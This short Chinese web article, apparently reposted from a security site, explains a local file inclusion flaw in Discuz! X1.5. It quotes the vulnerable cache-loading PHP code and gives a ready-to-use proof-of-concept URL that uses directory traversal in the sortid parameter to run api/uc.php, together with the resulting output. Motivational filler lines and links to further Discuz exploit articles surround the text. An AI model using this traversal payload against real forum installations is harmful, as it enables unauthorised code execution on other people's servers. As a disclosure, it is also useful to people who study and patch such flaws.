DISCUZ X1.5 本地文件包含漏洞说明

如果你相信一件事,就去相信,不用等别人来告诉你行或者不行!早安!你不能改变过去,但你可以改变未来。早安!争气永远比生气漂亮。
config_global.php

复制代码
代码如下:

  $_config['cache']['type'] = ‘file’;
  function cachedata($cachenames) {
  ……
  $isfilecache = getglobal(‘config/cache/type’) == ‘file’;
  ……
  if($isfilecache) {
  $lostcaches = array();
  foreach($cachenames as $cachename) {
  if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {
  $lostcaches[] = $cachename;
  }
  }
  ……
  }

  地址:
  http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
  http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried
  执行了 api/uc.php 页面代码了。
  作者: Jannock

本文DISCUZ X1.5 本地文件包含漏洞说明到此结束。这一路你可以哭,但一定不能怂小编再次感谢大家对我们的支持!

您可能有感兴趣的文章
discuz获取任意管理员密码漏洞如何利用工具vbs版

如何利用XSS渗透DISCUZ 6.1.0实战

Discuz! wap功能模块编码的注射漏洞

discuz!7.1、7.2 远程代码执行漏洞exp

2019最新RDP远程桌面漏洞官方补丁(针对win2003、win2008)